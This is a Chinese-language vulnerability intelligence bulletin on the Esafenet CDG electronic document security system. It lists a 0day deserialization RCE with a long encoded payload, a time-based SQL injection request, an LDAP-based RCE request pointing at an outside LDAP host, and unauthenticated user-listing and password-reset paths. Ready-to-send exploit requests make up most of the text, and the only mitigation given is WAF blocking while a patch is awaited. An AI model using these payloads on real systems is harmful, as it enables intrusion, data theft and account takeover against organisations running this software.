DMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
亿赛通电子文档安全管理系统docRenewApp存在反序列化漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/CDGServer3/docRenewApp?command=GETSYSTEMINFO |
WAF封禁路路径,等待发布补丁 |
812 |
0day |
漏洞详情
POST /CDGServer3/docRenewApp?command=GETSYSTEMINFO HTTP/1.1
NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
亿赛通电子文档安全管理系统SecretKeyService存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/CDGServer3/SecretKeyService |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
GET /CDGServer3/SecretKeyService?command=sameKeyName&keyName=1'+WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
亿赛通新一代电子文档安全管理系统远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/CDGServer3/logincontroller |
WAF封禁路路径,等待发布补丁 |
0813 |
1day |
漏洞详情
POST /CDGServer3/logincontroller HTTP/1.1
Host:
fromurl=/LdapAjax&token=1&command=testConnection&hosts=ldap://192.168.10.1:1379/CN=account,OU=exp,DC=exp,DC=com&users=account&dns=CN=account,OU=exp,DC=exp,DC=com&dns2=OU=exp,DC=exp,DC=com&type=0&pwds=123456
亿赛通新一代电子文档安全管理系统身份绕过漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/CDGServer3/openapi/getAllUsers |
|
|
|
| /CDGServer3/rpc/userManage/userPwdReset.js |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
|
|
漏洞详情
